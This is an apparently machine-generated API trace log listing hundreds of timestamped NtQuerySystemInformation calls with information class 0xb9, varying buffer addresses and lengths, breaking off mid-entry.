[0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.768] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9a0, Length=0x20, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c920, Length=0x20, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x28, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x28, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x28, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x20, ResultLength=0x0) [0283.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x38, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca60, Length=0x20, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9f0, Length=0x20, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccc0, Length=0x58, ResultLength=0x0) [0283.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9e0, Length=0x28, ResultLength=0x0) [0283.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x28, ResultLength=0x0) [0283.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cad0, Length=0x28, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c8c0, Length=0x20, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9b0, Length=0x20, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x38, ResultLength=0x0) [0283.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0283.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf28, Length=0x50, ResultLength=0x0) [0283.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0283.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0283.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd70, Length=0x28, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x38, ResultLength=0x0) [0283.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x20, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0283.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.822] 